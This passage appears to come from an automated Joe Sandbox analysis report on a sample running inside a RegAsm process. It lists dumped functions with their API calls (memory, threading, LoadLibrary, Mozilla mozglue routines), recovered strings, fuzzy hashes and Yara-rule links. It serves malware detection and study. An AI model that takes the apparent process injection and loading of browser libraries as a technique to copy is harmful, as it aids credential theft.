Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _freemalloc
String ID:
API String ID: 3576935931-0
Opcode ID: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
Instruction ID: b76dc663818b464284d97c71afdab2e33c7188303a79513cbdb4af8dfc28d3f2
Opcode Fuzzy Hash: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
Instruction Fuzzy Hash: CB112732B40A31EBCF216F79BC0575A37A5AF803B5F60403FF8498A250DE7C8980969C

Function 6C0776C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C0776F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C077705

Part of subcall function 6C02CA10: malloc.MOZGLUE(?), ref: 6C02CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C077717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C07778F,00000000,00000000,00000000,00000000), ref: 6C077731
free.MOZGLUE(00000000), ref: 6C077760

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 2538299546-0
Opcode ID: 42e4d28578b5688ea1b4687f56b61f673944a672058b2c3aee54e06c8d74ece3
Instruction ID: 6e4601867f61333b430a0dc8d43c8e7285d02cbdf34c60570a74cfaf0b3aa9d5
Opcode Fuzzy Hash: 42e4d28578b5688ea1b4687f56b61f673944a672058b2c3aee54e06c8d74ece3
Instruction Fuzzy Hash: 6511B2B19013256BE720AF7A8C44BABBEE8EF45394F044529F848E7300E7749940C7F2

Function 6C050D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C013DEF), ref: 6C050D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C013DEF), ref: 6C050D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C013DEF), ref: 6C050DAF

Strings

<jemalloc>, xrefs: 6C050D92, 6C050DB9
: (malloc) Error in VirtualFree(), xrefs: 6C050D97, 6C050DBE

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 3c02da98420c79f8d61c508b4874115b007122c353ef18645f1f001d7e220488
Instruction ID: 56d10b7416162ae0ea5b2513cb9e2d850d3951b22afacc6a0e9eb24d7c33f455
Opcode Fuzzy Hash: 3c02da98420c79f8d61c508b4874115b007122c353ef18645f1f001d7e220488
Instruction Fuzzy Hash: 9EF0E97238829423EA3025660D0AB5F26DDBBC2B6CFB09035F615DA9C0DE50E41056B4

Function 6C075850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6C07586C
CloseHandle.KERNEL32 ref: 6C075878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C075898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C0758C9
free.MOZGLUE(00000000), ref: 6C0758D3

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: a471da8bca68db7f95865d2fb1b85a0a510478635e4c3d02922904621f6a3482
Instruction ID: 16644f437584d209e7845565d3fdd67055cc30d07afc789fad2d2c3df32a0b73
Opcode Fuzzy Hash: a471da8bca68db7f95865d2fb1b85a0a510478635e4c3d02922904621f6a3482
Instruction Fuzzy Hash: 17016D75B04201ABDF10DF1AD808B467BFDFB83329B646176F61AD2210DF3199148F95

Function 6C067620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C0675C4,?), ref: 6C06762B

Part of subcall function 6C02CA10: malloc.MOZGLUE(?), ref: 6C02CA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C0674D7,6C0715FC,?,?,?), ref: 6C067644
GetCurrentThreadId.KERNEL32 ref: 6C06765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C0674D7,6C0715FC,?,?,?), ref: 6C067663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C0674D7,6C0715FC,?,?,?), ref: 6C067677

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 6b87a90445619eabd6bbbda0afe124d9f22461e381a4c00e17af9aad122dd99b
Instruction ID: 99fcc4cdff0a17e1261d801815f1b86bc3c2d18133f38b7231a79430a6045e14
Opcode Fuzzy Hash: 6b87a90445619eabd6bbbda0afe124d9f22461e381a4c00e17af9aad122dd99b
Instruction Fuzzy Hash: D0F0C271E10745ABE700CF21C888776B778FFEA669F115316F90953611EBB0A5D08BD0

Function 00426719 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00426725

Part of subcall function 00424954: __getptd_noexit.LIBCMT ref: 00424957
Part of subcall function 00424954: __amsg_exit.LIBCMT ref: 00424964

__getptd.LIBCMT ref: 0042673C
__amsg_exit.LIBCMT ref: 0042674A
__lock.LIBCMT ref: 0042675A
__updatetlocinfoEx_nolock.LIBCMT ref: 0042676E

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
Instruction ID: 61088e3dfc20ce59d559a3ddfa1e0e88c0a27e6c6fc14d0a94ffceeb635e971d
Opcode Fuzzy Hash: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
Instruction Fuzzy Hash: A0F09672F047309BDB11FB79740675E76A0AF4076CFA2014FF454A62D2CB2C5940D65D

Function 6C071700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C071800

Part of subcall function 6C04CBE8: GetCurrentProcess.KERNEL32(?,6C0131A7), ref: 6C04CBF1
Part of subcall function 6C04CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0131A7), ref: 6C04CBFA

Part of subcall function 6C014290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C053EBD,6C053EBD,00000000), ref: 6C0142A9

Strings

Details, xrefs: 6C071925
{marker.name} - {marker.data.name}, xrefs: 6C0718C7
name, xrefs: 6C071939

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: d2dc11b5c477817bc280fb7552c0eb9430f4e589bc6de4c1aa29507f58732fd0
Instruction ID: 875f8e26ff7d518e9e162272e511857dfabe7a4634ea58c26ae16090acd80908
Opcode Fuzzy Hash: d2dc11b5c477817bc280fb7552c0eb9430f4e589bc6de4c1aa29507f58732fd0
Instruction Fuzzy Hash: 6971D1B0A042069FCB08CF68C45079ABBF5FF85304F504669D8594BB81DB70FA98CBE1

Function 6C07B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6C07B0A6,6C07B0A6,?,6C07AF67,?,00000010,?,6C07AF67,?,00000010,00000000,?,?,6C07AB1F), ref: 6C07B1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C07B0A6,6C07B0A6,?,6C07AF67,?,00000010,?,6C07AF67,?,00000010,00000000,?), ref: 6C07B1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C07B0A6,6C07B0A6,?,6C07AF67,?,00000010,?,6C07AF67,?,00000010), ref: 6C07B25F

Strings

map/set<T> too long, xrefs: 6C07B1FA

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: bf2988beef8988d61af98b298cc239d73b7183bbd6ebd4f720ebc8515dc447a6
Instruction ID: 0f739e04080cf6652bae3c8b1f5ccfa240a636efe44f0264e966127197e6598e
Opcode Fuzzy Hash: bf2988beef8988d61af98b298cc239d73b7183bbd6ebd4f720ebc8515dc447a6
Instruction Fuzzy Hash: E86188746042458FD715CF19C880B9ABBF1FF4A718FA8C1A9D8598BB52C731EC45CBA1

Function 6C03D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C04CBE8: GetCurrentProcess.KERNEL32(?,6C0131A7), ref: 6C04CBF1
Part of subcall function 6C04CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0131A7), ref: 6C04CBFA

EnterCriticalSection.KERNEL32(6C09E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C04D1C5), ref: 6C03D4F2
LeaveCriticalSection.KERNEL32(6C09E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C04D1C5), ref: 6C03D50B

Part of subcall function 6C01CFE0: EnterCriticalSection.KERNEL32(6C09E784), ref: 6C01CFF6
Part of subcall function 6C01CFE0: LeaveCriticalSection.KERNEL32(6C09E784), ref: 6C01D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C04D1C5), ref: 6C03D52E
EnterCriticalSection.KERNEL32(6C09E7DC), ref: 6C03D690
LeaveCriticalSection.KERNEL32(6C09E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C04D1C5), ref: 6C03D751

Strings

MOZ_CRASH(), xrefs: 6C03D4BB

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 0aa2418c2f2378698c95491dcef929b887ce2ef8e1e78517b5c18c180dfbb517
Instruction ID: d55d8a9cd3a99e1c9d3c10156f9af657d081ebf93e4358e8960229932da7cca0
Opcode Fuzzy Hash: 0aa2418c2f2378698c95491dcef929b887ce2ef8e1e78517b5c18c180dfbb517
Instruction Fuzzy Hash: 9051E471A047128FD314CF29C09475AB7F5FB89704F24992EE5A9C7B84EB70E804CB92

Function 6C064630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C064721

Strings

-%llu, xrefs: 6C064733
profiler-paused, xrefs: 6C0646E4
., xrefs: 6C06476A

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 4c866e7f0ed9754a814b48ce43c587c735fda544e271d5b50286c4faf755c5f5
Instruction ID: 6ddd8a17169d2837ae6e007d5505020920d1507f9d8225c7d80bb58f995178bb
Opcode Fuzzy Hash: 4c866e7f0ed9754a814b48ce43c587c735fda544e271d5b50286c4faf755c5f5
Instruction Fuzzy Hash: 3E411871E04708AFCB08DFB9D86125EBBE5EB85754F10C63EF85557B41EB3098448791

Function 6C089830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C08985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C08987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C0898DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C0898D9

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: b155c0fb66493659e3dd3c28e09c7eb42185ad74a179099ec223010eba0a3a87
Instruction ID: 397cc12e258019e18c2df1fdccc5637e1b84276371ab5a87f30f4eea61fdf65e
Opcode Fuzzy Hash: b155c0fb66493659e3dd3c28e09c7eb42185ad74a179099ec223010eba0a3a87
Instruction Fuzzy Hash: 2931D471B00208ABDF14AF59D844BEF77E9EB85714F50843DEA1A9BB40DB316909CBE1

Function 6C0646E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C064721

Part of subcall function 6C014410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C053EBD,00000017,?,00000000,?,6C053EBD,?,?,6C0142D2), ref: 6C014444

Strings

-%llu, xrefs: 6C064733
profiler-paused, xrefs: 6C0646E4
., xrefs: 6C06476A

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: f980c02d7bfcce699dc82e29114f6d14a212a5b0b81cc7e742369e2cfa3700ff
Instruction ID: adb7fb7b5fe382a7698258abf9eaa4a71ca6a84aa6a17b7439bf53672303a3b4
Opcode Fuzzy Hash: f980c02d7bfcce699dc82e29114f6d14a212a5b0b81cc7e742369e2cfa3700ff
Instruction Fuzzy Hash: E2313971F042089FCB0CCFADD89179EBBE6DB89314F14813EE8059BB41EB7099448B90

Function 6C06B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C014290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C053EBD,6C053EBD,00000000), ref: 6C0142A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C06B127), ref: 6C06B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C06B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C06B4E4

Strings

pid:, xrefs: 6C06B4DE

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 873dbfb8578d5b3863a66038bddfa0a520a1ef61fa21768e1ac6423a945051d1
Instruction ID: bc86ff9c3d7b9f075bfcc8431d9c39940a899d424e37689d6919d30a9766c6e3
Opcode Fuzzy Hash: 873dbfb8578d5b3863a66038bddfa0a520a1ef61fa21768e1ac6423a945051d1
Instruction Fuzzy Hash: F23103B1A01218DBDB10DFAAD880BEEB7F9FF49318F540529E81167E41D731E845DBA1

Function 00410077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0041009A

Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33

__EH_prolog3_catch.LIBCMT ref: 00410139
std::_Xinvalid_argument.LIBCPMT ref: 0041014D

Strings

vector<T> too long, xrefs: 00410095, 00410148

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: vector<T> too long
API String ID: 2448322171-3788999226
Opcode ID: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
Instruction ID: ab79b4cfd7630e9d33afc21f0db27ea74fca8642dd6ebc8e538bd538cb18ba69
Opcode Fuzzy Hash: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
Instruction Fuzzy Hash: 7931E532B503269BDB08EF6DAC45AED77E2A705311F51107FE520E7290D6BE9EC08B48

Function 00413390 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004133AF
StrCmpCA.SHLWAPI(00000000,004367E0,?), ref: 004133E8

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

strtok_s.MSVCRT ref: 00413424

Strings

"xA, xrefs: 004133A1, 004133A4

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID: "xA
API String ID: 348468850-582338916
Opcode ID: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
Instruction ID: 530b5b9384520956d988ef5f9eef14088f7e00acaaf5feba0a58aa85cdec459f
Opcode Fuzzy Hash: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
Instruction Fuzzy Hash: 74118171900115AFDB01DF54C945BDAB7BCBF1430AF119067E805EB192EB78EF988B98

Function 6C01F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6C08D020), ref: 6C01F122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C01F132

Strings

shell32, xrefs: 6C01F11D
SHGetKnownFolderPath, xrefs: 6C01F12C

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: d28e955d17662032dc8010af9f3d51694746577a77f4fdc98653eb75e8188f75
Instruction ID: 5d96639c5ad1bded96f86f6e12043d38917e59374afa82c52bee100c7ea21b31
